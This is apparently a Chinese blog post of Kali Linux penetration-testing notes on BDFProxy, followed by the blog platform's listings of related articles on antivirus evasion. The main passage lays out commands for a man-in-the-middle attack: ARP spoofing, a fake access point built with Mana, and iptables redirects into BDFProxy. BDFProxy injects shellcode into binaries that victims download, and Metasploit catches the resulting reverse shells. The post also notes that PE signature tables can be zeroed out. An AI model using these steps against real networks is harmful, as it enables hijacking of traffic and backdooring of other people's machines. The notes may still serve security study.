免杀Bdfproxy

最新推荐文章于 2024-06-21 08:30:00 发布
最新推荐文章于 2024-06-21 08:30:00 发布
阅读量384 收藏
点赞数
分类专栏: kali_linux渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42952508/article/details/128032056
版权

Bdfproxy(mitmproxy)

● 基于流量劫持动态注入shellcode(ARP spoof、DNS spoof、Fake AP)
步骤:

sysctl -w net.ipv4.ip_forward=1  #启动本地路由转发

iptables -t nat -A PREROUTING -p tcp --dport 80/443 -j REDIRECT --to-ports 8080

vim /etc/bdfproxy/bdfproxy.cfg
  proxyMode = transparent
  #修改侦听IP地址并启动bdfproxy

arpspoof -i eth0 -t 1.1.1.2 1.1.1.1
  启动Msf

● Mana创建Fack AP
● Bdfproxy代理注入代码
● Msf侦听反弹shell

vi /etc/mana-toolkit/hostapd-mana-conf
  #修改无线SSID名称

./usr/share/mana-toolkit/run-mana/start-nat-simple.sh
  #修改wlan1无线网卡适配器并启动
  iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80/443 -j REDIRECT --to-port 8080

  vi /etc/bdfproxy/bdfproxy.cfg
    proxyMode = transparent
    修改侦听IP地址并启动bdfproxy

  #启动MSF
  Msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

补充
● 全站HTTPS防注入(微软每个补丁都带马)
● PE文件证书签名可被清除
● PE Header -> Optional Header -> Certificate Table(Address and size)
○ 全部用0覆盖
○ BDF默认清除数字签名
https://live.sysinternals.com/

网络点点滴
关注
专栏目录
APT级全面免杀拿Shell
悦分享
08-02 847
现在情况是已经上传了一句话木马,可以执行如:ls、pwd、whoami等命令;不管是python、bash 还是 perl 都反弹不了, 偷不了懒了,就上 msf 吧。
Kali linux 学习笔记(八十五)免杀——Bdfproxy 2020.4.21
闵行小鱼塘
04-21 1208
本节学习bdfproxy
.NET 一款免杀的Suo5隧道代理脚本
ahhacker86的专栏
06-21 795
Sharp4Suo5.aspx 是Suo5高性能的 HTTP 隧道代理工具在.NET环境下的免杀脚本,主要用于绕过WAF和主机反病毒软件,脚本支持 IIS .NET Framework >= 2.0 的所有版本和 .NET Core。这类工具在渗透测试和红队活动中非常有用,尤其是在需要隐蔽通信的场景中。
免杀对抗&Go魔改二开&Fscan扫描&FRP代理
qq_45087791的博客
04-09 2493
渗透测试过程中,有后渗透需求时,需要进行反向代理,最早接触的是frp工具,但是在使用过程当中会有配置文件落地,如果忘记删除的情况下容易被溯源C2地址。官方版本的frp在默认配置传输过程中有一些明显的特征,在如今多种安全设备防护的内网会遭受到识别和拦截,如果不进行去除特征或者进行加密传输的话很可能会被设备拦截掉。在落地使用过程中流量及文件不修改的情况下基本被检测查杀,针对这种情况,我们要进行了一些基本的参数测试和特征去除外加功能拓展。=>>直接编译(匹配hash值)=>>功能添加扫描项。
WooyunWifi高级组合技&一套连击拿SHELL
weixin_34259159的博客
03-08 2365
lxj616 · 2015/08/14 10:250x00 概述十步之外,可取汝SHELL本文介绍了使用WooyunWifi+BDFproxy+Metasploit的GETSHELL工具组合,并介绍了BDF的原理,并简要介绍了WooyunWifi+beEF+Metasploit的GETSHELL组合及其原理本文使用的工具及缩写一览:Backdoor Factory(后门工厂),缩写:bdfBack...
免杀所有杀软的端口转发工具
大方子
09-27 1296
平时在渗透测试中大家经常会用到内网渗透,然而内网渗透中很重要的一个步骤就是端口转发。 常见的端口转发 lcx.exe nc.exe Using php/jsp/aspx Script iptables端口转发 nginx端口转发 等等…… 其中lcx.exe、nc.exe以及使用脚本转发,都有可能被防护/杀毒软件拦截,而后者则略微有点麻烦(不会告诉你是因为我真懒!) 我是一个非常喜...
第十六章 免杀
09-11 384
恶意软件  – 病毒、木马、蠕虫、键盘记录、僵尸程序、流氓软件、勒索软件、广告程序  – 在用户非自愿的情况下执行安装  – 处于某种恶意的目的:控制、窃取、勒索、偷窥、推送、攻击............ 防病毒软件▪ 恶意程序最主要的防护手段  – 杀毒软件 / 防病毒软件  – 客户端 / 服务端 / 邮件防病毒▪ 检测原理  – 基于二进制文件中特征签名的黑名单检测方法  – 基...
kali linux学习笔记,包括环境配置、工具熟悉、信息收集、缓冲区溢出、提权、渗透、密码破解、隧道、拒绝服务、免杀、取证、metasploit
闵行小鱼塘
11-02 2511
这是之前学习kali linux的学习笔记的目录
BDFProxy-ng:重写BDFProxy(https
05-23
#The Backdoor Factory Proxy NextGen(BDFProxy-ng)v0.1 bdfproxy-ng是一个分支并回顾了原始BDFProxy( ) ##什么是新的 添加了对deb文件的支持(Debian和Ubuntu) 增加了对ar和xz存档的支持 增加了对mime类型...
BDFProxy:通过MITM修补程序二进制文件
04-01
BDFProxy的新版本将于2021年7月发布,仅向赞助商提供! 赞助者在这里: : 博客: : 后门工厂代理(BDFProxy)v0.3.8 仅适用于安全专业人员和研究人员。 ###现在仅适用于v.0.17> = MITMPROXY> = v.0.11 码头...
BDFProxy 安装
07-27
要安装 BDFProxy,您可以按照以下步骤进行操作: 1. 首先,确保您的系统上已经安装了 Python 2.7 和 pip。您可以通过运行以下命令来检查它们是否已安装: ```shell python --version pip --version ``` 如果...
rossmann_sales_prediction.ipynb
09-26
rossmann_sales_prediction.ipynb
基于java的智慧社区设计与实现开题报告.docx
09-26
基于java的智慧社区设计与实现开题报告.docx
基于SuperAGI 专注中文领域的大模型AI应用框架.zip
09-26
基于SuperAGI 专注中文领域的大模型AI应用框架.zip
高并发内存池的内存释放流程图
09-26
释放内存过程的调试
基于java的社区团购系统的开题报告.docx
09-26
基于java的社区团购系统的开题报告.docx
全域用户运营方案.pptx
09-26
全域用户运营方案.pptx
Modelsim10.4软件安装说明《PDF文档》
最新发布
09-26
Modelsim10.4软件安装说明《PDF文档》 Modelsim10.4软件安装说明
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值